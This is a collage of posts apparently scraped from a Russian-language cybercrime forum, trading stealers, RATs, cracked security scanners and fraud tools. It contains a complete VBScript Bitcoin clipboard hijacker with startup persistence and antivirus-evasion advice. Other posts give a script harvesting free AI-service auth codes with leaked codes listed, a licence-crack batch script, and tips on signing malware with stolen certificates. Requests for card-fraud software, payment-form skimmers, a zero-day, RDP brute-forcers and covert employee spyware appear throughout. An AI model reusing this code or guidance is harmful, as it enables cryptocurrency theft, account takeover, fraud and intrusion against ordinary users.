Stealer и валидатор сессий Instagram Twitter Tiktok Reddit Roblox Steam
Discord Token Stealer
Вся личная информация Discord (Имя пользователя, номера телефонов, адрес
электронной почты, платежная информация, статус Nitro, биография учетной
записи Discord, PP учетной записи Discord, идентификатор учетной записи
Discord, статус MFA учетной записи Discord)
Системная информация
Последний копипаст из буфера обмена
Stealer заголовков активных окон
Stealer процессов
Цифровая подпись
Обфускация в реальном времени
Процесс иньекции Keylogger после кражи (необязательно, именно кейлоггер больше
всех палится)
Методы запуска (schtask и regedit startup) (необязательно)
Средство смены значков (файл значка должен заканчиваться на .ico, и если вы не
видите, что значок изменился, поместите файл на рабочий стол и посмотрите еще
раз, и вы увидите, что значок изменился.) (Необязательно)
Ultra Strong Anti-VM (Exela использует 12 различных методов Anti-VM)
(дополнительно)
Эксешник отправляет в дискорд через вебхук.
Алго подписи уже был тут, не имеет смысла т к хром и винда всё равно, кинут
уведомление о неизестном авторе. + топ антивирусы уже ищут только сертификаты.
При такой реализации можете потребовать у юзера отрубить интернет во время
установки - даст плюсы.
Так, на будущее легче сделать сертификат и регать его на файлы. Батник на
Developer PowerShell for VS 2021 (2).lnk
такой будет:
@echo off
echo signtool sign /f "E:\Users\Obshina\Documents\cert.pfx" /p yourpasswd /fd SHA256 "E:\Users\Obshina\Documents\sample.exe" | "E:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2021\Visual Studio Tools\Developer PowerShell for VS 2021 (2).lnk"
Вариант запуска через биндер есть.
По сертификатам нужно озадачиться, да выложить полноценный мануал. Один
инструмент мало.
По сертификатам нужно озадачиться
Click to expand...
Глобальная проблема. К сожалению методов обхода пока нет, только выкрасть пароль от готового и китайцы в этом преуспевают, году 17м даже на одном из англ. форумов публиковали старые серты - винда пропускает без проблем даже с просроченной датой.
![ru.files.fm](/proxy.php?image=https%3A%2F%2Ffiles.fm%2Fimages%2Ffiles.fm- fb.png%3Fv%3D3&hash=37da96cc0f2275b2a72ccd8f756d0cd4&return_error=1)
Visit this link to download: Exela-V2.0.zip
ru.files.fm
Ищу софт
galaxy-s-launcher-1-1-2
Буду благодарен за помощь
https://raidforums.com/Thread-Checkmarx-CxSAST-9-4-0-Crack-Only может кто перезалить?
Взят на просторах телеги, выложил как есть. DLLки, которые с панелью закидываются не проверял.
anonfiles.com
](https://dropmefiles.com.ua/en/26PESXGv)
You can quickly share photos, send videos, or transfer large files (up to 100GB). Upload files without registration, the speed of uploading and downloading files is not limited.
dropmefiles.com.ua
Pass: xss.is
меня уверяют что очень Крутая штука сейчас и можно купить хороший софт за 5к$, и делать не плохие деньги, но не до конца верю всему этому, может есть у кого- то информация
Доброго времени суток.Выучил основы пайтон не так давно, интересуюсь крипторами, подскажите фрейм ворк позволяющий написать криптор под ратники андроида
Всем привет. Посоветуйте на личном опыте годный софт для изменения голоса при аудмозвонке в телеграм/вотсап в онлайн режиме.
Download Link - https://www.upload-4ever.com/2rt1bfzav4ck
Hello, friends,
Today I am sharing with you a scraping code prepared by a user from another
forum.
Enjoy...
This is a little sample of how much you can get from https://liaobots.work
Every ip gets about 8k tokens/5 auth codes worth of gpt 4, gemini pro, or claud opus. Current scraping code below is a piece of a larger project I'm doing, simply all it does is make a request to the api to gather these codes and put em into a json, if you can manage to make shit loads of requests within say, 10 seconds u can get more. Just run the code below and use a VPN, I'm implementing this into a discord bot so you don't need to deal with their shitty site that monitors your activity with session replay, just ask for a link and I'll pm. Use the auth codes yourself without coding, simply use their site and change the codes once it's depleted. Any questions about making your own client u can just pm me about it. Codes are strictly 13 characters long, uppercase and lowercase with numbers
Code:Copy to clipboard
pTIQr4FTnVRfr
usJnRXHoJoYxj
J72WlyQXEsH88
gJQ1EsMkoIxqe
UNcpwxggJ3DHj
fOBS5BG6nSjXd
tNOHcn7BQ1OPW
jF1jt5f3rHtJm
TNfdQJcKidhZp
N59gAViUkgeIW
PtYYwb70e4guS
6eybahARcxl2H
RVMtcyDEyLuO
HzlM1fem5eK9e
TNM1eYbbhHTKb
Y6Emcq5ExLkME
Nkj13eS47xpTr
```const axios = require('axios');
const fs = require('fs');
const path = require('path');
const data = JSON.stringify({ "authcode": " " });
const config = {
method: 'post',
url: 'https://liaobots.work/api/user',
headers: {
'Content-Type': 'application/json',
'Referer': 'https://liaobots.work/',
'Origin': 'https://liaobots.work',
'cookie': 'gkp2=YgA62VmMKGEuVwkbz2HB'
},
data: data,
responseType: 'json'
};
async function fetchAndStoreAuthCodes() {
while (true) {
try {
const response = await axios.request(config);
const { authCode } = response.data;
let authCodes = [];
const filePath = path.join(__dirname, 'authCodes.json');
if (fs.existsSync(filePath)) {
const fileContent = fs.readFileSync(filePath, 'utf8');
try {
const parsedContent = JSON.parse(fileContent);
if (Array.isArray(parsedContent)) {
authCodes = parsedContent;
} else {
console.error('File content is not an array, initializing with an empty array.');
}
} catch (parseError) {
console.error('Error parsing JSON from file, initializing with an empty array:', parseError.message);
}
}
authCodes.push(authCode);
fs.writeFileSync(filePath, JSON.stringify(authCodes, null, 2), 'utf8');
console.log(`AuthCode ${authCode} saved.`);
} catch (error) {
if (error.response) {
if (error.response.status === 404) {
console.log('Received 404 error');
break;
} else if (error.response.status === 401) {
console.log('Received 401 error, stopping.');
break;
}
} else {
console.error('Error:', error.message);
}
}
}
"(c) skullcmd"
Нашёл на гитхабе исходники клиппера, но не могу понять, есть ли в коде спрятанные кошелёки или нет.
](https://github.com/Megavolt777/OnionClipper?tab=readme-ov-file)
🔑 Open source clipper written on C#. Contribute to Megavolt777/OnionClipper development by creating an account on GitHub.
github.com
Может кто-нибудь помочь разобраться чистый ли клиппер или нет?
Давным-давно у меня был софт, который позволял скачивать видосы с Udemy прямо
на жёсткий диск. Канул в Лету (
Может у кого остался, если он актуальный.
Или может быть есть новые решения?
Hidden content for authorized users.
](https://anonfiles.com/R16cq8Hdu6/sublime_text_build_4107_x64_setup_exe)
anonfiles.com
](https://anonfiles.com/b172qdHaud/ST4107_by_ZeNiX_with_keygen_zip)
anonfiles.com
нужен софт для вбива СС с базы
Пишите в ТГ @dogon1_1
Онли с репой и портфолио
Гарант
Пример 100к логов персер находит в них все файлы в формате .pdf или .doc любой
другой формат
и складывет и записывает в отельную папку с линуом на лог в скоторго этот фаил
есть такие скрипты готовые нет?
Tenable Nessus is one of the most widely recognized vulnerability scanning tools used in cybersecurity. It helps organizations identify vulnerabilities, misconfigurations, and security weaknesses in their networks, systems, and applications.
https://www.tenable.com/downloads/nessus?loginAttempted=true
Link: https://mega.nz/file/Cb50BLzI#hAyoZmE80jIrkQbQ8WRP15wPfFFbgjVEtIML14k07I8
For updates, if you are using this software you should probably be able to figure it out. Anyone can get these all-2.0.tar.gz files for free from Tenable (nessus essentials and follow directions for offline update) (https://www.tenable.com/products/nessus/nessus-essentials) and you can see in the batch file what I'm doing so you can just replace the all-2.0.tar.gz file with a new one and edit the date in the plugin_feed_info.inc file and then run the crack.
Spoiler: READ THE INSTRUCTIONS
This is the simple version of the instructions that includes the installer and the plugins update file. It is a simple procedure to do all of this including getting the software and updates, but it confuses people and I thought I'd try just bundling it all together like this.
1. run the installer Nessus-10.3.1-x64.msi
choose the defaults during the install and let it load "Compiling plugins..."
choose managed scanner, then pick tenable.sc, then set a username and password
nessus will again compile plugins
after nessus loads, close the browser
2. run the _crack.bat batch file as administrator
it should automatically stop the service, update plugins, fix permissions, etc
3. Open https://localhost:11123/ and log in
(or if set up on your vps, https://vps.ip.address:11123/)
NOTE that it takes a very long time for compiling plugins! That's Nessus.
4. Go to Settings -> Advanced, and disable telemtry and updates.
Set dark mode
Changing any settings will always cause Nessus to restart
and thus "compile" the plugins again taking a long time, but that's just the
way it is.
enjoy!
Credit to: Pwn3rzs
Note: I am not here to help you with the installation, everything works, if
you don't know how to use it them forget about it. Follow the instructions.
You will need a huge amount of resources to be able to work with this tool.
Stuxnet was developed by the American and Israeli governments and used to wreak havoc on an Iranian nuclear facility called Natanz. It targeted the computer system of the machines used to enrich uranium, known as centrifuges, and instructed them to spin the machines out of control
DOWNLOAD:
https://cdn1.filehaus.su/files/1731624820_28654_1734216820/Stuxnet_Code.cs
DOWNLOAD:
[ https://cdn7.filehaus.su/files/1731624801_60524_1734216801/stuxnet- PYTHON.zip ](https://cdn7.filehaus.su/files/1731624801_60524_1734216801/stuxnet- PYTHON.zip)
Дроппер кракса спавнит 2 ярлыка или 3 ярлыка на телефоне жертвы? Столкнулся с такой проблемой что когда у жертвы спавнится 2 ярлыка на рабочем столе, то удалив 1 из них теряется весь кон, можно это как то исправить или все таки хуевый антиделит на мертвеце краксе?
Betternet VPN for Windows
Get the fastest, most secure VPN experience on the web right on your PC. Betternet’s unlimited VPN for Windows allows you to get started as soon as you download the app. Make sure your web browsing experience is a secure one.
Use Betternet VPN on your Windows device to keep your online browsing safe and secure. Betternet is a fast Windows VPN for all your privacy and security needs.
Reliable, Speedy Connection
Betternet is able to provide a high-quality, stable connection because we own all of the hardware and software we work with.
Setup Made Simple
The ease of setup makes Betternet stand out from the crowd. You can get connected to the web securely in just a few clicks.
-WwW.Dr-FarFar.CoM.zip****
All Contents of Dr.FarFar Are For Educational Purposes Only
Originally developed by Synergistic Software and released in 1997, Hellfire was not an official Blizzard product and did not carry Blizzard’s endorsement or label. Despite that, in response to Diablo players who have expressed a desire to experience the content, Blizzard has given the OK for it to be included as a free add-on with Diablo purchases on GOG.COM.
Hellfire offers a non-canonical single-player storyline where players must defeat a powerful demon named Na-Krul who is threatening Tristram. The expansion also adds a Monk class, new weapons and items, new missions, locations, dungeons, and enemies. Hellfire will be accessible while launching the original Diablo.
and Streaming : Internet Archive ](https://archive.org/details/hellfire_source)
The source code to Diablo: Hellfire, the expansion to Diablo by Synergistic Software
archive.org
![www.gog.com](/proxy.php?image=https%3A%2F%2Fimages.gog- statics.com%2F2a351ec2315d2b082c120a1499434480758e56603d2cf21a93e544300c0f3829.jpg&hash=30b12f468877c9c5d8a6862b3ee5fdc4&return_error=1)
Contient maintenant Hellfire ! Développée par Synergistic Software et sorti en 1997, Hell
www.gog.com
Отказ от ответственности: это не было разработано мной, но я нашел это полезным, поэтому я размещаю его здесь
Вот рабочий сортировщик журналов, работающий с node.js. Требуется fs-extra (sudo pacman - S fs-extra / sudo apt install fs-extra) кидайте свои папки с логами в /logs/ и запускайте index.js, каждый сайт будет записан в текстовый файл как комболист.
кто пишит конфиги на SilverBullet.v1.1.2 отпишите для сотрудничества
телега @BagaBoomm
Всех приветствую, хотел бы найти слепок етх блокчейна ( список всех активных
кошельков)
Где-то находил но оч старые года этак 19.
Может есть у кого линк на более свежую базу? Буду очень благодарен )
Вдруг кому-то еще пригодится
Нужен был прокси чекер и решил по фасту написать + поделиться с вами). Т.к не
нашёл нормального.(собран pyinstaller'ом)
Работает с socks5, такого формата:
ip:port:log:pass
ip:port@log:pass
log:pass@ip:port
logs:pass:ip:port
ip:port
Проверка на 3 сервисах JSONIP, SEEIP, ICANHAZIP. Записывает для каждого сервиса отдельный файл + bad.txt
analysis/NDhhYjlmN2JjMTQwZWVjNzZjNTBhMTYzNzRlY2QxY2Y6MTcwMDExNjI4MA==)
VirusTotal
![www.virustotal.com](/proxy.php?image=https%3A%2F%2Fwww.virustotal.com%2Fgui%2Ffile- analysis%2FNDhhYjlmN2JjMTQwZWVjNzZjNTBhMTYzNzRlY2QxY2Y6MTcwMDExNjI4MA%3D%3D%2Fimages%2Ffavicon.svg&hash=a7c84fe9c403639fd26eb47ebbd1381e&return_error=1) www.virustotal.com
Скачать
![www.dropbox.com](/proxy.php?image=https%3A%2F%2Fwww.dropbox.com%2Fstatic%2Fmetaserver%2Fstatic%2Fimages%2Fopengraph%2Fopengraph- content-icon-file-zip- landscape.png&hash=61e6c593e3100a7f93f2d6c30bda817b&return_error=1)
](https://www.dropbox.com/scl/fi/gflrhguma1z9t1x2ojhv6/proxychecker.zip?rlkey=0xgmq7tdug8olz43wpzq7cche&dl=0)
Shared with Dropbox
www.dropbox.com
Собственно, в срочном порядке ищется\купится генератор данных заданной области
на фоне шаблона водительских.
Генератор ФИО, транслит ФИ, цифровые данные.
Вывод сразу в готовое изображение (под печать). Фото менять не стоит.
Не запускается virtualbox & Parallels на montrey, чип М1, parallels даже не
качал, сразу предупредили, что не работает.
Какие варианты кроме дедика есть еще на данный чип с ОС?
бы рад). Главное чтобы он был бесплатный и в него можно что - то вшить.
Ищу софт
Tun2TAP for Android Socks To VPN_v2.1_...
Буду благодарен за помощь
поиске кряка для обхода фрп на андроиде. желательно тот, который подходит для большинства телефонов Huawei.
Hone successfully used a virtual camera on ios or android for KYC? there is 1 or 2 or iphone which doesnt seem to pass verification even with a perfect photo/video. I feel like apps that use kyc use the face id unlock feature combined with the webcam to pass liveness kyc now a days. any thoughts?
вопрос в названии, может есть какие то приват софты
Сливаю вам расширение под хром с клиппером. Нашёл на каком-то борде. Может кому-то будет интересно переделать под себя или просто изучить . Пароль местный
![send.exploit.in](/proxy.php?image=https%3A%2F%2Fsend.exploit.in%2Fsend- fb.358d4b57.jpg&hash=824ffe54bac782fbc1c2b7f04639d4b7&return_error=1)
](https://send.exploit.in/download/c41123dfecf618ab/#q5rXpBtHM9fD-MmXCFQWZA)
Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.
send.exploit.in
Куплю ваш Js Sniffer под форму оплаты на сайте / iframe / redirect
Писать в лс с ценой, на какой цмс сниффер, методами скрытия снифера в коде и
пруфами своей репутации.
Looking for soft for webcam bots viewers
На свой страх и риск
Hidden content for authorized users.
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/D3AVmSaQ#gfMvxylCzTRuY3v7xTSJeiaDvgGFcgcjr3Z52asXNM4)
mega.nz
Старенькая, но вполне рабочая и активированная версия.
Функционал найдёте на сайте разработчика.
Запускать только в VM!
Spoiler: VT
https: //www.virustotal.com/gui/file/30785da049b13f1cd228be54f6ce25d801f3fc4890dada9464830e078df7cf94
Spoiler: Pass
Местный
Ищу Кто сделает рассылку Теоеграмм или Дискорд по игровой тематике
Всем ку, ищу у кого есть написанный чекер по моим направлением, задача чекера
проверять валид и желательно считать сколкьо ордеров в месяц или в день .
magento / opencart.com / prestashop.com / самописы на валид (тут я понимаю что
все индивидуально, но надежду не теряю )
готов к различному роду сотрудничесву. первый конаткт ПМ
Каким софтом можно 1 txt большой на примере 100 ГБ разделить допустим на 4 файла по 25гб
HCL AppScan Standard полностью активирован
- это устройство для проверки динамического анализа, разработанное для экспертов по защите и пентестеров для использования во время проведения оценок безопасности сетевых приложений и интернет-предложений. Оно выполняет компьютеризированное сканирование, которое исследует и проверяет интернет- пакеты, и состоит из одного из самых мощных механизмов сканирования в международном масштабе.
Проверка ваших веб-программ перед развертыванием и постоянная оценка рисков, связанных с ними в производственной среде, могут помочь вам избежать нарушений безопасности роскошных веб-утилит.
Reports (XML, PDF, HTML and Word) now include the same general content and structure as the user interface.
[Скачать](https://www.gulf- up.com/v3qractri0r3)+VirusTotal
Source : Dr.FarFar
Download Link - https://www.upload-4ever.com/ykjysqwnl5uu
Invicti Professional v24.10
Download : [ссылка](https://pwn3rzs.co/scanner_web/invicti/Invicti-
Professional-v24.10-Pwn3rzs-CyberArsenal.rar)
Password : Pwn3rzs
Note:
Use the reg file to fix the Renderer error.
[Changelog](https://www.invicti.com/changelogs/invicti-
standard/v24-10-0-8-october-2024/)
**Взято из ТГ канала: Pwn3rzs
**
Save it as .vbs
[/B] BTC = "UR BTC ADDRESS HERE" On Error Resume Next Set re = New RegExp With re .Pattern = "\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{26,35}\b" .IgnoreCase = False .Global = False End With Set objHTML = CreateObject("htmlfile") do wscript.sleep(200) CB = objHTML.ParentWindow.ClipboardData.GetData("text") If re.Test(CB) Then If InStr(CB, BTC) > 0 Then Else SetB (BTC) End If End If loop Function SetB(input) CreateObject("WScript.Shell").Run _ "mshta.exe javascript:eval(""document.parentWindow.clipboardData.setData('text','" _ & Replace(Replace(Replace(input, "'", "\\u0027"), """","\\u0022"),Chr(13),"\\r\\n") & "');window.close()"")", _ 0,True End Function [B]
You can crypt it with a vbs crypter if you want to...
and u can also use a batch script to copy it to startup
copy "%TEMP%\Clipper.vbs" %USERPROFILE%\Start Menu\Programs\Startup
-RULES
DO NOT SCAN IT ON THESE WEBSITES
Jotti
virustotal
DO NOT UPLOAD IT TO THESE SITES
Mediafire
USE A DOWNLOADER OR A BINDER
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F8e6625f0e44027c15c9427fb5d2ad9bdfb036c1f9bf4fc57be3e2d73c8d8d9a1%2FOG- Sadpanda%2FSharpExcelibur&hash=9e70da2c075d9a8c412ce92b9b410f17&return_error=1)
using Cobalt Strike's Execute-Assembly ](https://github.com/OG- Sadpanda/SharpExcelibur)
Read Excel Spreadsheets (XLS/XLSX) using Cobalt Strike's Execute-Assembly - OG-Sadpanda/SharpExcelibur
github.com
Activated.jpg](https://xss.is/attachments/34380/)
Source: [Invicti Professional Full](https://www.Dr-FarFar.com/invicti- professional-full/)
I need Cypher 7 Which support Live screen and unlock SCREEN up to android 11.
AsyncRAT
-Open-source project
-Stable connection {Asynchronous Socket}
-Secure Connection {SSL}
-Multi-ports and Pastebin connection
-Task AKA on-connect
-Coded in C# client dependency 4.0 {pre-installed on Windows 8, Windows 8.1, Windows 10}
-Client size is only 47KB
Features Included:
#Monitoring
-Remote desktop
-Remote camera
-File manager
-Process manager
... and more
#Extra
-Loader [Send file to memory "RunPE"]
-Bot killer
-USB spread
-Remote shell
-Chat
-File Searcher
... and more
Spoiler: download https://cutt.ly/vGHaKLk
[ Binder ] Coded in C# | Framework 4.5. Required-
[ Output ] Native | Framework Unrequired-
Try on VPS & Leave Your Honest Feedback -
Br
RedGuard, производный инструмент, основанный на технологии управления потоками командно-контрольного (C2) фронта, имеет облегченный дизайн, эффективное взаимодействие с трафиком и надежную совместимость с разработкой на языке программирования go. Поскольку кибератаки постоянно развиваются, упражнения красных и синих команд становятся все более сложными, RedGuard призван обеспечить лучшее решение для скрытия канала C2 для красной команды, которое обеспечивает управление потоками для канала C2, блокирует "вредоносный" аналитический трафик и лучше выполняет всю задачу атаки.
RedGuard - это инструмент управления потоком C2-канала, который позволяет избежать обнаружения Blue Team, AVS, EDR, Cyberspace Search Engine.
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F489841047%2F63368b58-b4f1-4cc8-b959-2854376097e8&hash=ae38e3f999fdd463bec960faec9f30a3&return_error=1)
avoid Blue Teams,AVs,EDRs check. ](https://github.com/wikiZ/RedGuard)
RedGuard is a C2 front flow control tool,Can avoid Blue Teams,AVs,EDRs check.
github.com
Всех приветствую, кто работает или работал с андроид ботнетом окто, отпишите в
лс пожалуйста если вам не трудно уделить мне буквально несколько минут, хочу
задать свои вопросы и посоветоваться перед покупкой столь недешевого софта
Пишите сюда либо лучше в тг @OFF_CDR
Кто знает, скиньте ссылку
В комплекте софт, инструкция и 400+ чатов.
Скачать : https://dropmefiles.com/M4e9J
Брат, ищу systembc, ссылка недействительна.
Code:Copy to clipboard
https://xss.is/threads/69581
Помогите мне загрузить ссылку, спасибо
Куплю бот для отправки сообщений игрокам wot куплю за хорошие деньги,или напишите или имеющийся уже!!ТГ @aaingaylung
Доброго времени суток. Ищу AlienFox
AlienFox представляет собой модульный тулкит, в который входят различные
кастомные инструменты и модифицированные опенсорсные утилиты, созданные
разными авторами.
Предназначен для атак на неправильно сконфигурированные хосты в популярных
сервисах, включая платформы онлайн-хостинга, такие как Laravel, Drupal,
Joomla, Magento, Opencart, Prestashop и WordPress.
облачных почтовых платформ, включая 1and1, AWS, Bluemail, Exotel, Google
Workspace, Mailgun, Mandrill, Nexmo, Office365, OneSignal, Plivo, Sendgrid,
Sendinblue, Sparkpostmail, Tokbox, Twilio, Zimbra и Zoho.
Im looking for xdumpgo
Please upload it here
Only setup file
You must have at least 5 reaction(s) to view the content.
Подскажите утилиту или софт по поиску сайтов по ключевым словам разных ГЕО
заранее спасибо!
Всем привет. В поиске софта: что бы в него- загрузить нужный линк, он ищет его
по файлам пассвордс, и где находит, дропает целиком папку в отдельное место.
Если Crystall Sorter так умеет делать, то объясните пожалуйста как
И желательно что бы софт справлялся с большими объемами логов.
Приветствую!
Можете сказать чем можно пробрутить rdp кроме как nlbrute
Важно чтобы он сьедал строки такого формата:
1.1.1.1:login:password
А не в отдельных текстовиках по типу ip.txt login.txt pas.txt
Заранее спасибо.
Нужно что то по типу такого
https://github.com/ShinyEni/Millenium-RAT
чтобы было
Keylogger
User log off/PC hibernating
Screenshot grabbing
Files&Folders: copy, delete, download, upload, list etc
Активные вкладки и прочее
аудио
Мне нужен тг бот для того чтобы директор офиса мог наблюдать за сотрудниками, тоесть он в любой момент мог понять что делает щас сотрудник и мог просмотреть что он делал и говорил,
Тоесть скрипт делает скрин через определенное время и записывает аудио и отправляет на ftp сервер, например 5/13/2024 и для каждого комютера своя папка и там аудио и скрины,
а другие функции в телеграм боте когда например нужно прям щас узнать что он
делает,
готовые решения по типу https://www.mipko.ru/ очень дорого оказалось (30к)
поэтому думаю может свою написать
Web Archive Downloader это мощная, современная программа для скачивания архивов веб сайтов. С помошью Web Archive Downloader вы можете быстро и удобно скачать все виды архивированных файлов, включая, HTML страницы, Style Sheets, JavaScripts, фото и видео. Web Archive Downloader имеет интуитивно понятный и удобный интерфейс, который будет понятен даже новичку.
Лечение:
Программа:
Hidden content for authorized users.
Virustotal:
Loader
Установщик
Дополнительно
Скачать программу:
Возможно, кому-то будет полезен этот скрипт.
В архиве 3 файла: cli.php, cookies.txt, reviews.txt. В файле cookies.txt
должны находиться валидные cookie-строки вида HSID=*; SSID=*; SID=*
.
В файле reviews.txt - тексты отзывов, которые нужно опубликовать (1 строчка -
1 отзыв).
Отзывы публикуются в порядке 1 валидный cookie - 1 отзыв. В начале скрипта в переменной $settings нужно указать ID расширения в магазине Chrome, timeout (задержку в секундах между публикацией отзывов) и start (количество звёзд на отзыве, от 1 до 5).
Прокси для работы не нужны. Этим скриптом я опубликовал 100+ отзывов с одного IP, гугл нормально к этому отнёсся.
Пример работы скрипта:
UPD: Рейтинг расширения обновится через ~1 сутки. Но отзывы будут доступны сразу в соотвествующей вкладке на странице расширения.
Подскажите Android Botnet, приват или бесплатный (рабочий) без разницы, также можете в лс написать примерную цену если вы можете создавать такие вирусы (ТЗ обсудим), всем добра
Разобрались
Code:Copy to clipboard
Plugin Set 202204091550
Policy Template Version 202203281503
Update Instructions:
1. Find nessuscli in your Nessus installation directory (Linux is in the directory /opt/nessus/sbin/; Windows is in C:\Program Files\Tenable\Nessus by default)
2. stop nessus service
Code:Copy to clipboard
sudo systemctl stop nessusd
3. Update plugin package
Code:Copy to clipboard
sudo /opt/nessus/sbin/nessuscli update ./all-2.0_20220409.tar.gz
A successful update will prompt:
Code:Copy to clipboard
* Update successful. The changes will be automatically processed by Nessus.
4. Start the Nessus service
Code:Copy to clipboard
sudo systemctl start nessusd
Windows Update Script:
Code:Copy to clipboard
net stop "Tenable Nessus"
attrib -s -r -h "C:\ProgramData\Tenable\Nessus\nessus\plugins\*.*"
attrib -s -r -h "C:\ProgramData\Tenable\Nessus\nessus\plugin_feed_info.inc"
"C:\Program Files\Tenable\Nessus\nessuscli.exe" update "C:\Users\Public\Desktop\all-2.0-20220409.tar.gz"
copy "C:\ProgramData\Tenable\Nessus\nessus\plugins\plugin_feed_info.inc" "C:\ProgramData\Tenable\Nessus\nessus\"
attrib +s +r +h "C:\ProgramData\Tenable\Nessus\nessus\plugins\*.*"
attrib +s +r +h "C:\ProgramData\Tenable\Nessus\nessus\plugin_feed_info.inc"
attrib -s -r -h "C:\ProgramData\Tenable\Nessus\nessus\plugins\plugin_feed_info.inc"
net start "Tenable Nessus"
Download:
Hidden content for authorized users.
](https://anonfiles.com/f1VfS8W2x7/all-2.0-20220409.tar_gz)
anonfiles.com
Он не только считает количество записей всего, но и так же происходит запись в
базу данных. На выходе Вы можете получать сразу БД готовую к продаже в
автоматическом онлайн магазине. Подсчет сс, кошельков, удаление лишнего
мусора, но это еще не все, при дополнительной плате Вы сможете получить целый
комбаин который будет обрабатывать логи от кучи Ваших разных стиллеров.
Цена за 1 формат из под Вашего стиллера $200.
Функционал может быть расширен.
Есть ли у кого?
Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved, but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++.
Скрытый рабочий стол (часто называемый HVNC) - это инструмент, который позволяет операторам взаимодействовать с сеансом удаленного рабочего стола без ведома пользователя. Протокол VNC не задействован, но в результате получается аналогичный опыт. Эта реализация Cobalt Strike была создана как альтернатива форкам Tiny Nuke, написанным на C++.
Разработчиками протестирован на:
"Пуск" не работает.
Spoiler: Гитхаб
https:// github.com/WKL-Sec/HiddenDesktop
AppSpider 7.4.24.3 Crack
use in vm
[https://mega.nz/file/xd5mGDBZ#CR- sAtDFEi...qE630WEVtU](https://raidforums.com/misc.php?action=safelinks&url=https%3A%2F%2Fmega.nz%2Ffile%2Fxd5mGDBZ%23CR- sAtDFEiH-Z9Sor1viKevBsj8M2nj51qE630WEVtU)
Hidden content for authorized users.
Mega: https://mega.nz/folder/PYFiwTBI#k3uxizmg3z7U75lahx3dDw
Приветствую всех читающи х
Есть ли на этом форуме кряки стилеров, которые и в правду работают по сей день? большую часть я проверил самостоятельно, и как вы могли уже понять, они не рабочие)
Если кто то и в правду сможет помочь, оставьте линк в комментарияхClick to expand...
Приветсвую, нужен кодер который имеет возможность сделать софт по отправки писем на электронную почту! Работа за %
куплю LPE 0 day
приемлимая цена 100-150к
возможен торг. работа через гаранта. вперед не плачу
Есть список админок. с примерно таким синтаксисом
https://domain.com:login:password
или таким
login@gmail.com:password:https://domain.com/
это не важно, синтаксис меняется.
руками проверять нереально. очень много.
посоветуйте софт, который сможет проверить логин/пароль вообще подходят или
нет.
админки магенто, вордПресс, cpanel могут быть. и т.д.
xDedic Socks System - software for a installing socks service to your PC, may
be used to share internet from pc to local network, also can be installed at
remote server\computer. After installing you can use remote computer as proxy
server.
Spoiler: Virus total
xDedicSocksSystem.exe - https://www.virustotal.com/gui/file/d7c8c6ec488b4f456414f2cdf3445aa61a1babc50cfd9004da36e4c99429a1ab
xDedicSocksSystem.zip - https://www.virustotal.com/gui/file/1f8c01aa14fba8fcee778b33f374fd7c2170d4808685173438e91b80eb32fe24
Spoiler: Download
https://send.exploit.in/download/087e067497763189/#nuzVYsSAZDAsuvnL1gwmSA
https://gofile.io/d/9MIfGN
https://envs.sh/tNu.zip
https://oshi.at/HhSR/xDedicSocksSystem.zip
https://ufile.io/un7p58s7
https://we.tl/t-bueyGcIlRO
У кого то есть исходники отп бота телеги с гитхаба? Ross1337 снесли. Может быть есть аналоги? Нужен для личного пользования. Скиньте пожалуйста
Нужен софт, чтоб чекал запросы с логов не по 1 и не в кучу все скидывал, а под каждый запрос сохранял в свой txt
Можете посоветовать где искать или кто может дать кряк Android RAT ERMAK? Очень срочно нужно
HCL AppScan , previously known as IBM AppScan , is a family of desktop and web security testing and monitoring tools, formerly a part of the Rational Software division of IBM. In July 2019, the product was acquired by HCL Technologies and is currently marketed under HCL Software, a product development division of HCL Technologies. AppScan is intended to test both on- premise and web applications for security vulnerabilities during the development process, when it is least expensive to fix such problems. The product scans the behavior of each application, whether an off-the-shelf application or internally developed, and develops a program intended to test all of its functions for both common and application-specific vulnerabilities. This family of products is capable of performing SAST, DAST, IAST and Mobile Analysis against the user's source code and check for vulnerabilities.
10.6.0.28408 Add bookmark Aug 23, 2024 latest version of this web security scanner, cracked using ngen method, tested/working. this is a windows software they do not make it for linux. special thanks to dr.farfar for the setup exe.
You must have at least 3 reaction(s) to view the content.
Картография в основном для путешествий, но вы можете быть партизаном,
курьером, заблудившимся или без интернета желать пройти кратчайшим маршрутом,
обойти тупик или пролезть через границу.
Гайд на основе сервиса из F-Droid:
У меня есть распакованная версия Everspy, не могли бы вы помочь мне, как преобразовать ее в исходный код
](https://www.virustotal.com/gui/file/30da1bdffdab55682e1c7221de68c3dedf0b25543868d3087833a2a74e99aa47)
VirusTotal
www.virustotal.com
![send.exploit.in](/proxy.php?image=https%3A%2F%2Fsend.exploit.in%2Fsend- fb.358d4b57.jpg&hash=824ffe54bac782fbc1c2b7f04639d4b7&return_error=1)
](https://send.exploit.in/download/4df0186ed9b13ba0/#lgGTNTY1kQW2bFdhAe9Tmw)
Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.
send.exploit.in
This tool is designed to scan URLs with injection parameters obtained via GoSpider and then automatically render them visually in a browser using Selenium and Firefox to observe site behavior. Its primary goal is to capture paths and successfully execute vulnerabilities such as XSS, LFI, RCE, SQLi, among others. Captured data is generated, added to PoC reports, and analyzed via an OCR API interface. Additionally, the tool enables cookie management, extracting cookies through a Chrome extension that should be saved in a .json file. It also offers the option to perform injections using both GET and POST methods. Another valuable feature is payload injection into request headers (User-Agent, etc.). The tool can run autonomously, notifying us via a configured Telegram bot with an alert on a detected vulnerability, successful payload, and a screenshot.
escanea URLs con parámetros de inyección obtenidos con GoSpider, automatizando pruebas visualmente en Firefox. Detecta XSS, LFI, RCE y SQLi ⚠️, inyectando payloads por GET y POST ](https://github.com/MammaniNelsonD/P4IvisualInyect)
Una Tool 🔍 para BugHunters que escanea URLs con parámetros de inyección obtenidos con GoSpider, automatizando pruebas visualmente en Firefox. Detecta XSS, LFI, RCE y SQLi ⚠️, inyectando payloads po...
github.com
Доброй ночи h4x0rz
